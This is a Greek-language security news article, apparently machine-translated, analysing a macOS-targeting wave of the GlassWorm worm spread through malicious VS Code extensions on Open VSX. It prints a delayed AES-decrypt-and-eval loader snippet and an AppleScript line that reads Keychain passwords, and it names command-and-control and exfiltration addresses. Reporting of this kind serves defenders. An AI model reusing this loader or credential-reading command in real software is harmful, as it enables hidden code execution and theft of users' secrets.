Ένα νέο κύμα κακόβουλου λογισμικού GlassWorm έχει εμφανιστεί, σηματοδοτώντας μια σημαντική αλλαγή στη στρατηγική στόχευσης από τα Windows στα συστήματα macOS. Αυτός ο αυτοδιαδιδόμενος ιός τύπου worm, που διανέμεται μέσω κακόβουλων επεκτάσεων VS Code στην αγορά Open VSX, έχει ήδη συγκεντρώσει πάνω από 50.000 λήψεις.
Το τέταρτο κύμα εισάγει πολλές σχετικές αλλαγές, συμπεριλαμβανομένων κρυπτογραφημένων ωφέλιμων φορτίων, δυνατοτήτων trojanization πορτοφολιών υλικού και εξελιγμένων τεχνικών αποφυγής sandbox που του επιτρέπουν να παρακάμψει τα παραδοσιακά εργαλεία σάρωσης ασφαλείας.
Ο ηθοποιός απειλής πίσω από το GlassWorm έχει αποδειχθεί εξαιρετικά προσαρμοστικός, εξελίσσοντας μέσα από τέσσερα διαφορετικά κύματα από τον Οκτώβριο. Οι προηγούμενες καμπάνιες βασίζονταν σε αόρατους χαρακτήρες Unicode και μεταγλωττίστηκαν δυαδικά αρχεία Rust για να κρύψουν κακόβουλο κώδικα.
Η τελευταία επανάληψη εγκαταλείπει αυτές τις προσεγγίσεις υπέρ των κρυπτογραφημένων ωφέλιμων φορτίων JavaScript AES-256-CBC που έχουν σχεδιαστεί ειδικά για περιβάλλοντα macOS.
.webp.jpeg "Αυτοδιάδοση GlassWorm Weaponizing VS Code Extensions για επίθεση σε χρήστες macOS")
Τρεις ύποπτες επεκτάσεις επισημάνθηκαν στην αγορά Open VSX: pro-svelte-extension, vsce-prettier-pro και full-access-catppuccin-pro-extension, όλες συνδεδεμένες μέσω κοινής υποδομής και κλειδιών κρυπτογράφησης.
Το κακόβουλο λογισμικό χρησιμοποιεί μια υποδομή εντολών και ελέγχου βασισμένη σε blockchain Solana που καθιστά σχεδόν αδύνατες τις προσπάθειες κατάργησης.
Αναρτώντας σημειώσεις συναλλαγών που περιέχουν URL με κωδικοποίηση base64 στην αλυσίδα μπλοκ, ο εισβολέας διατηρεί αποκεντρωμένο έλεγχο που δεν μπορεί να διαταραχθεί μέσω του παραδοσιακού αποκλεισμού τομέα.
Οι ερευνητές εντόπισαν την υποδομή στη διεύθυνση IP 45.32.151.157, η οποία χρησιμοποιήθηκε επίσης στο τρίτο κύμα, επιβεβαιώνοντας τη συνέχεια του παράγοντα απειλής.
Koi αναλυτές αναγνωρισθείς το κακόβουλο λογισμικό μέσω της ανάλυσης συμπεριφοράς αφού η μηχανή κινδύνου τους εντόπισε ασυνήθιστα μοτίβα στη συμπεριφορά επέκτασης και στις επικοινωνίες δικτύου.
Κρυπτογραφημένες τακτικές αποφυγής ωφέλιμου φορτίου και Sandbox
Το τέταρτο κύμα εισάγει έναν έξυπνο μηχανισμό χρονισμού που έχει σχεδιαστεί για να αποφεύγει την αυτοματοποιημένη ανάλυση ασφαλείας. Μόλις εγκατασταθεί, η κακόβουλη επέκταση περιμένει ακριβώς 15 λεπτά πριν εκτελέσει το ωφέλιμο φορτίο της.
Αυτή η καθυστέρηση είναι κρίσιμη επειδή τα περισσότερα περιβάλλοντα sandbox λήγουν μετά από 5 λεπτά, πράγμα που σημαίνει ότι το κακόβουλο λογισμικό εμφανίζεται εντελώς ευνοϊκό κατά τη διάρκεια της αυτοματοποιημένης σάρωσης.
Ο κωδικός περιέχει μια κωδικοποιημένη τιμή 9e5 χιλιοστών του δευτερολέπτου (900.000 χιλιοστά του δευτερολέπτου ισούται με 15 λεπτά), η οποία ενεργοποιεί την αποκρυπτογράφηση και την εκτέλεση του κρυπτογραφημένου ωφέλιμου φορτίου AES-256-CBC.
setTimeout(() => {
const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
let payload = decrypted.update(encryptedData, 'base64', 'utf8');
payload += decrypted.final('utf8');
eval(payload);
}, 9e5);.webp.png "Αυτοδιάδοση GlassWorm Weaponizing VS Code Extensions για επίθεση σε χρήστες macOS")
Το ίδιο το ωφέλιμο φορτίο είναι ενσωματωμένο στη γραμμή 64 του κύριου αρχείου επέκτασης, κρυπτογραφημένο με ένα σκληρό κλειδί και διάνυσμα προετοιμασίας που παραμένει συνεπές και στις τρεις κακόβουλες επεκτάσεις.
Αυτή η κοινή κρυπτογραφική υποδομή επιβεβαιώνει ότι ένας μεμονωμένος παράγοντας απειλής είναι υπεύθυνος για την καμπάνια.
Μετά τη λήξη της περιόδου καθυστέρησης, το κακόβουλο λογισμικό ανακτά το τρέχον τελικό σημείο εντολών και ελέγχου από την αλυσίδα μπλοκ Solana και εκτελεί οποιεσδήποτε οδηγίες λαμβάνει.
Το ωφέλιμο φορτίο για το macOS περιλαμβάνει AppleScript για stealth εκτέλεση, LaunchAgents για persistence και όχι κλειδιά μητρώου των Windows και άμεση πρόσβαση στη βάση δεδομένων του macOS Keychain για την ανάκτηση αποθηκευμένων κωδικών πρόσβασης και διαπιστευτηρίων.
set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"Το κακόβουλο λογισμικό περιλαμβάνει επίσης τη δυνατότητα αντικατάστασης εφαρμογών πορτοφολιού υλικού με trojanized εκδόσεις, στοχεύοντας τόσο στο Ledger Live όσο και στο Trezor Suite.
Ενώ η λειτουργία αντικατάστασης πορτοφολιού δεν ήταν πλήρως ενεργή κατά τη διάρκεια της δοκιμής στις 29 Δεκεμβρίου 2025, η υποδομή κωδικών είναι πλήρης και αναμένει μεταφορτώσεις ωφέλιμου φορτίου.
Το κακόβουλο λογισμικό επικυρώνει ότι τα ληφθέντα αρχεία υπερβαίνουν τα 1000 byte πριν από την εγκατάσταση, αποτρέποντας τις κατεστραμμένες εγκαταστάσεις που ενδέχεται να ειδοποιήσουν τα θύματα.
Όλα τα κλεμμένα δεδομένα τοποθετούνται στον προσωρινό κατάλογο /tmp/ijewf/, συμπιέζονται και αποστέλλονται στον διακομιστή exfiltration στο 45.32.150.251/p2p για ανάκτηση από τον εισβολέα.
